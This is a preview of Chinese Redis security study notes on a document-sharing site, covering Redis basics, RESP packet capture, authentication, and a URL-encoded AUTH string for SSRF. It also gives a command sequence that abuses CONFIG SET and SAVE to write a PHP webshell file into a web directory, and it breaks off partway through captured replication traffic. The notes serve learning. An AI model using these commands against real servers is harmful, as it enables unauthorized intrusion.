没有合适的资源?快使用搜索试试~ 我知道了~
redis安全学习小记1
资源推荐
资源详情
资源评论
redis安全学习小记
编者荐语:
好文,推荐收藏!
以下文章来源于xray社区 ,作者郁离歌丶
xray社区
一款免费的威胁测试工具,支持主动、被动多种检测方式,自备盲打平台、可以灵活定…
基础
https://www.runoob.com/redis/redis-tutorial.html
环境 :ubuntu 安装redis
$sudo apt-get update
$sudo apt-get install redis-server
$service redis-server start
$redis-cli
redis连接命令
redis-cli -h 127.0.0.1 -p 6379
设置键值对:
set myKey abc
取出键值对:
get myKey
今天Timeline Sec
127.0.0.1:6379> set yulige 123123
OK
127.0.0.1:6379> get yulige
"123123"
通 过 nc 监 听 或 者 socat 抓 包 的 方 法 socat -v tcp-listen:6378,fork tcp-
connect:localhost:6379
或者是
tcpdump tcpdump -i eth0 port 6379 -o nopass.pcap
可以发现发送的数据为
*3
$3
set
$6
yulige
$6
123123
和
*2
$3
get
$6
yulige
获取配置
CONFIG GET *
编辑配置
你可以通过修改 redis.conf 文件或使用 CONFIG set 命令来修改配置。
https://www.runoob.com/redis/redis-conf.html
数据类型
Redis支持五种数据类型:string(字符串),hash(哈希),list(列表),set(集合)及
zset(sorted set:有序集合)。
服务器配置
redis 学习笔记 | 安装与启动
sed -i 's/daemonize no/daemonize yes/g' /etc/redis-5.0.8/redis.conf
后台运行redis
认证
redis设置密码的两种方法:
redis-cli连上去
config set requirepass 123456
或者修改redis.conf
sed -i 's/# requirepass foobared/requirepass foobared/g' /etc/redis/redis.conf
第二种方法设置完之后需要重启redis。
然后再用redis-cli去连的时候需要先执行AUTH命令才可以执行其他命令。
AUTH PASSWORD
redis-cli -a的参数本质是就是AUTH命令。然后因为客户端将命令发送到Redis服务器的流程为:
客户端向Redis服务器发送一个仅由Bulk Strings组成的RESP Arrays。
Redis服务器回复发送任何有效RESP数据类型作为回复的客户端。
https://www.anquanke.com/post/id/181599
所以在ssrf的时候只要在前面加上添加
%2A2%0d%0a%244%0d%0aAUTH%0d%0a%246%0d%0a123123%0D%0A ,即可。
数据库备份
Redis SAVE 命令用于创建当前数据库的备份。常见利用其来写文件达到getshell的目的。
redis-cli -h 127.0.0.1 flushall #清空所有key
redis-cli -h 127.0.0.1 config set dir /var/www #设置数据库备份保存的目录
redis-cli -h 127.0.0.1 config set dbfilename shell.php #设置数据库备份保存的文件
名
redis-cli -h 127.0.0.1 set webshell "<?php phpinfo();?>" #将想写入的内容写进key
值
redis-cli -h 127.0.0.1 save # 备份
主从复制
主 从 复 制 , 是 指 将 一 台 Redis 服 务 器 的 数 据 , 复 制 到 其 他 的 Redis 服 务 器 。 前 者 称 为 主 节 点
(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。
默认情况下,每台Redis服务器都是主节点;且一个主节点可以有多个从节点(或没有从节点),但一
个从节点只能有一个主节点。
https://www.cnblogs.com/kismetv/p/9236731.html#t2
输入命令 slaveof host port 之后发生了哪些事情呢?
> 2020/04/10 09:30:01.182183 length=14 from=0 to=13
*1\r
$4\r
PING\r
< 2020/04/10 09:30:01.182422 length=7 from=0 to=6
+PONG\r
> 2020/04/10 09:30:01.182595 length=49 from=14 to=62
*3\r
$8\r
REPLCONF\r
$14\r
listening-port\r
$4\r
6379\r
< 2020/04/10 09:30:01.182875 length=5 from=7 to=11
+OK\r
> 2020/04/10 09:30:01.183002 length=59 from=63 to=121
*5\r
$8\r
REPLCONF\r
$4\r
capa\r
$3\r
eof\r
$4\r
capa\r
$6\r
psync2\r
< 2020/04/10 09:30:01.183203 length=5 from=12 to=16
+OK\r
> 2020/04/10 09:30:01.183300 length=72 from=122 to=193
*3\r
剩余17页未读,继续阅读
资源评论
兰若芊薇
- 粉丝: 22
- 资源: 301
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功